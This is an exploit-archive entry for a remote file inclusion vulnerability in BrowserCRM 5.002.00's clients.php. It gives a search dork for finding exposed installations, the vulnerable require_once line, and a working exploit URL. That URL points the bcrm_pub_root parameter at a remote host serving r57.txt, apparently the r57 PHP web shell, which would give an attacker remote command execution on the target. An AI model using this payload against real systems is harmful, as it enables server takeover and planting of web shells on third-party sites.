[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability
# Published : 2008-06-08
# Author : ahmadbady
# Previous Title : XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability
# Next Title : Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability
script: browsercrm-5.002.00 remote file including
Download From: http://www.browsercrm.com/download/browsercrm-5.002.00.tar.gz
dork: Copyright ?? 2007 BrowserCRM Ltd
Vuln Code :
require_once($bcrm_pub_root . "/public_prepend.inc.php")
exploit:
www.site.com/browser_crm/pub/clients.php?bcrm_pub_root=http://www.gwebspace.de/mohsen/shell/r57.txt?
Author: ahmadbady | kivi_hacker666@yahoo.com
# www.Syue.com [2008-06-08]